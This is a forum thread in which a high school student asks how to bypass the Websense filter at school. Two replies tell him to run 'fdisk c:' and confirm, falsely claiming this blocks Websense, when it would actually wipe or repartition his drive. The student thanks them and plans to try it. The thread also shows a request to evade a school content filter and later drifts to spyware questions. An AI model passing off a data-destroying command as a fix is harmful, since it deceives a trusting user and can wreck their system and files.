Thread: Websense....

Websense....

Hey! I am a student at my local high school and I can not acess certain sites due to a web blocker know as Websense. It will not allow me to access any site such as myspace or anything. Also proxy avoidances do not work, I have tried but they are blocked. I know I can get in serious trouble for doing this but, is anyone still willing to help me??? Thanks.

Sure, here's what you do.

Open a command prompt and type (without the quotes) "fdisk c:" when it prompts to confirm press y and enter.

Good luck.
    Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
    - Samuel Johnson

Yes "fdisk" will "Fix" your disk in a way that the software comming from websense is blocked from accessing the "disk" and displaying that annoying message. Good luck, kiss kiss.
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

Alright guys, thanks a lot. And sorry if this was for some reason in like the wrong forum, this was my first post and I am totally new to the website so thanks.

You are most welcome. Can we be of further assistance?
    West of House
    You are standing in an open field west of a white house, with a boarded front door.
    There is a small mailbox here.

Hi

Read this:http://www.antionline.com/showthread...light=websense

and see if you get the answer you are looking for....searching the site sometimes will help....
    PC Registered user # 2,336,789,457...

"When the water reaches the upper level, follow the rats."
    Claude Swanson

Nope, I will try it out later when I get to school on Wednesday because of a four day weekend but there is one thing actually. On my home computer ((currently using)) I have Norton 2005 and Adaware and Pandaware ((Spywear checker/remover/blocker)) Even though I have these and scan regularly ((Weekly)) I still get 100's of spyware. I do not even go to many websites, like I mainly use it for gaming. Is it possible I get some spyware from like the games?